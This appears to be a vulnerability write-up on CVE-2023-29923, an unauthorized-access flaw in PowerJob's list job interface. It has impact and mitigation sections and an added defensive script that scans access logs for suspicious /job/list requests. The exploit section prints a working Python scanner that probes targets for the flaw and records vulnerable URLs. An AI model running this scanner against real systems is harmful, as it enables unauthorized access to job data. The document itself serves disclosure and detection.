Description
The CVE-2023-29923 vulnerability is a security flaw in PowerJob V4.3.1 that allows unauthorized access to assets via the list job interface. This vulnerability is caused by insecure permissions, which can be exploited by attackers to gain access to sensitive information.
Impact
This vulnerability can have a significant impact on the average internet user, as it can allow attackers to access sensitive information without authorization. This can include personal data, financial information, and other confidential data. The vulnerability can also be used to launch further attacks, such as phishing attacks or malware infections.
Exploit
To exploit this vulnerability, attackers can use a Python script that sends a request to a specified URL and checks for the existence of the vulnerability. The script uses the list job interface to gain unauthorized access to assets and saves the results in a result.txt file. Here is a code snippet from the script:
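
    import time

    import requests

    # write_result() is defined elsewhere in the script; it records the URL in result.txt.
    def send_req(url_check):
        # Build the URL of the list job interface from the base URL.
        url = url_check + '/job/list'
        header = {
            'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69',
            'Content-Type':'application/json;charset=UTF-8',
            'Accept-Encoding':'gzip, deflate',
            'Accept-Language':'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6'
        }
        # JSON body: first page of jobs for appId 1.
        data = {
            "appId":1,
            "index":0,
            "pageSize":10
        }
        try:
            # verify=False is used below, so silence urllib3's certificate warning.
            requests.packages.urllib3.disable_warnings()
            response = requests.post(url=url,headers=header,json=data,verify=False,timeout=3).json()
            # The script treats a true 'success' field as the sign that the flaw is present.
            if response['success']:
                write_result(url_check)
            time.sleep(1)
        except Exception:
            # Timeouts, connection errors and non-JSON replies are ignored.
            pass
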
The script uses the requests module to send a POST request to the list job interface with a JSON payload. If the response indicates that the vulnerability exists, the script writes the URL to a result.txt file.
Mitigation
To protect against this vulnerability, users should update to the latest version of PowerJob and ensure that all security patches are applied. Users should also ensure that their systems are properly configured and that access controls are in place to prevent unauthorized access. Additionally, users should be cautious when opening emails or clicking on links from unknown sources, as these can be used to launch phishing attacks or malware infections.
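To check whether the list job interface has already been queried from outside trusted networks, the following added example (not from the original page or from the PowerJob project) scans access-log lines for POST requests to /job/list. It assumes a reverse proxy in front of PowerJob that writes combined log format; the trusted ranges, function names and sample lines are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote

# Assumption: a reverse proxy in front of PowerJob writes combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Assumption: networks allowed to reach the PowerJob console; adjust per site.
TRUSTED = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2023:10:01:02 +0000] "POST /job/list HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.1.2.3 - - [12/May/2023:10:02:00 +0000] "POST /job/list HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/May/2023:10:03:10 +0000] "POST //job/list/?x=1 HTTP/1.1" 200 498 "-" "python-requests/2.28"',
    '198.51.100.9 - - [12/May/2023:10:03:11 +0000] "GET /job/list HTTP/1.1" 405 0 "-" "curl/8.0"',
    '203.0.113.7 - - [12/May/2023:10:04:00 +0000] "POST /job/%6cist HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
]


def is_job_list(target):
    """True if the request path is the list job interface, ignoring the query
    string, percent-encoding, duplicate slashes and a trailing slash."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/+", "/", path).rstrip("/").endswith("/job/list")


def find_suspect_requests(lines, trusted=TRUSTED):
    """Return (client, timestamp, status) for every POST to /job/list whose
    source is outside the trusted networks."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not is_job_list(m["target"]):
            continue
        try:
            inside = any(ipaddress.ip_address(m["ip"]) in net for net in trusted)
        except ValueError:
            inside = False  # unparseable client field: report rather than hide
        if not inside:
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for client, ts, status in find_suspect_requests(SAMPLE_LOG):
        print(f"{ts} {client} POST /job/list -> HTTP {status}")
```

A hit with status 200 means the server answered the request, so those entries are the ones to review first.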